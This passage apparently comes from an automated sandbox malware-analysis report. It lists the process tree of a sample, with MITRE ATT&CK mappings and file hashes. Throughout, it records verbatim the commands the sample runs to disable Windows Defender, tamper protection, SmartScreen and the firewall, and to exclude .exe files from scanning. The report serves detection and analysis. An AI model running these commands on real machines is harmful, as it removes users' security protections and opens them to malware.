- Suspicious use of AdjustPrivilegeToken
PID:5940 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableIOAVProtection /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:5212
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6068 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:6348
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5724
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6308 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:6404
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6512 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5864
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6692 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5772
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SpynetReporting /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3336
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SubmitSamplesConsent /t REG_DWORD /d 2 /f3⤵
- Modifies registry key
PID:5232
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:5152
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4448 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5216
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6380 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1192
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6908 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance /Disable3⤵PID:5736
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cleanup /Disable3⤵
- System Location Discovery: System Language Discovery
PID:4480
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan /Disable3⤵
- System Location Discovery: System Language Discovery
PID:6508
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3576 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Verification /Disable3⤵
- System Location Discovery: System Language Discovery
PID:5632
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3492 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1480
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:6664
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4980 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" delete HKCR\*\shellex\ContextMenuHandlers\EPP /f3⤵PID:5808
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f3⤵PID:3040
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4956 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f3⤵
- System Location Discovery: System Language Discovery
PID:6512
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3584 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:740
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2628 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f3⤵
- Modifies Security services
- Modifies registry key
PID:5124
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4188 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3512
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f3⤵
- Modifies Security services
- Modifies registry key
PID:6624
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2460 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f3⤵
- Modifies security service
- Modifies registry key
PID:5804
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6544 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4444
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" takeown /f "%systemroot%\System32\smartscreen.exe" /a2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5836 -
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /f %systemroot%\System32\smartscreen.exe /a3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6920
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /reset2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6672 -
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /reset3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5408
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" taskkill /im smartscreen.exe /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1640 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /im smartscreen.exe /f3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5892
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-182⤵
- Suspicious use of AdjustPrivilegeToken
PID:7128 -
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-183⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:1332
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension .exe2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -PUAProtection disable2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5744
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6384
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7160
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ScanScheduleDay 82⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:6900
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6268
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
7Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD528854213fdaa59751b2b4cfe772289cc
SHA1fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA2567c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA5121e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4
-
Filesize
11KB
MD52eb8bc6fde584f9df25a730d5331aaab
SHA1533bea603c52bf4c1e770fd819cc9089a8f53109
SHA2564814a51b202c897a37ec6af4488cc3a87b8a0e2ec581e363bfa35f9fcf646b54
SHA512d6d374462de04a490a594949bd4672874d1c9bfc711287190b684d3a000fa740866d8bc039cdb900310ff942057164fdf9592c3926b82632661ad27e25a62820
-
Filesize
11KB
MD5ea77f2408f9e7d0f3f3f13cd210cb735
SHA1dd84d513987f7462cef279feaa4b5c75709ccf7f
SHA256d7b45021e2de0c0a0c3b8f619422be755263749e4178145778bcebc792492f87
SHA512745601ae9b388f3d61526c01366d73c971f2c26bae75e9df96d33f1c57d31af27b43ed8dd799c6eb37666631c344f6bdd059995ebf5b9494f96dc21eddbd29b9
-
Filesize
11KB
MD545519a3958ab72568e285cc3bb577692
SHA1be4c0675d13447bcd10c91983360560fedc51358
SHA25661c05984c3c6b0c63fb0b2b93d956c00083a9481cdd69d84c0a3fd3f930f2d50
SHA5124b5e54b1effbc0bf4b1cc4fae95b5be08321b8404f5ca4a8b985d1caaa43395f38e9f04e05614682686b01b413f742d519e20c69dc6eeba303a6612a9f9d0b78
-
Filesize
11KB
MD51363458adc254dc9939032994df8ab64
SHA18a04570cd9d04c7be48a587339544e53bb0a4e0d
SHA2568be75485bf2e91db4e753c658d03dac5f40bd0dbb858c4535afa31f1e8c5d6b7
SHA512c39009b1185e506ecf6415712eaa50c4d592de371a9c9a8e6ef7de71e062f6b7ca69f30eb9a832fa2e94698b68a566099266234ab02be5f928398a99a0a95c08
-
Filesize
11KB
MD52b06358be0ae1c2c4bf17b07aa0fb806
SHA1ff18d4465a5d647490cdfd1a1e4d5fbee27bf5fc
SHA256b2cd02f05c894d3352ce94699a8a05f62b3581d71b97867c7cbcd0ab899cd87c
SHA512138907fa3df49d057c92ed2e9fdf1a5684aca8d91968346722607b4ea58395767de4fdb81ee693405526cb6105c549ef081978316366130200cf9521313e8f72
-
Filesize
11KB
MD5de8a63672f56cf58206e43fec1f36d6e
SHA135a4466d836be80746177da4f137e4e091108798
SHA2567bc64a9ea1ec308d8d272571839dc03f4c2c21224b6eb4b48f81970ed3a64fef
SHA512e98d0929205d48064534df1d4a3d717b1dc4435ef9c7e078e70fc0b6958f69f1f1b4c0197cadc9c267b1f5c14ce831c38edaac199dbdaef79397c58eea59a2ed
-
Filesize
11KB
MD5ee37fb46bca929a9d6670284814efae7
SHA1b9767db7f3783fe216293b06e6c0a915ef95a1db
SHA256faa2094af60ac93fb0586b8a1285416cdab535c3b01421f9f81ab6eec1f8bcd8
SHA5124af7f998dc0360b19f9b68597fdb8c9388c5397b8b6b804e04e3df4e94e87b574893307c743caf64bb4a635bafdd57264c50a24db8f573b05eb7d331b069104d
-
Filesize
11KB
MD544f8d970ded759228c3151a0dd619abf
SHA146458cdc480da0c32295187eeb8cc1f7e8d737fb
SHA256d7423ea321f8aabeff36fdf1bded870c5ec151e97a26eaa4dfca34fcb0bc66ab
SHA512c7b20c473c50846109e048e17b9eeb470a7a03840a1f392bdd1ee18206ac9ea2de6987daff468de46d771c07e27cd3935871cb925f042ccbd43d7b520f4c5ff0
-
Filesize
11KB
MD57dd550d348894ced59e197284a894cae
SHA11d51b1dd93c6337a58d67d50a459265bd070e9eb
SHA2565ff7b0fe077e7741b4b043b74f44f562ed5a8695b744004213542c944e784c26
SHA5121809a7a8f3f9fb8ecd8143aa6e223d1bb0e75c6ec0770848afcca9566332bfe59058cff23f1e1a331641c1c655678ce737e9092f88344c8ef65f9d4880cbf113
-
Filesize
11KB
MD5e2821c25b6779ca79caa50fd51582028
SHA1a2c658e2a4e58c412985d2c9529be3600ed96ec8
SHA2568571213abc63893bc697dd2773f2be741e669986170b36efb3b19567207b0528
SHA512c5747d07c0c5257dc1674beb38762e73d34e7f9c3854f6cb6bc279fdda2deda7ba0c70f134bc84653fa4b1b95ffc0a5d7c5d77041a3977ee2a434db2db86b9e2
-
Filesize
11KB
MD5d723c553af5ad088f0717404109531d4
SHA104091241587326282b9afd287153124412eb8110
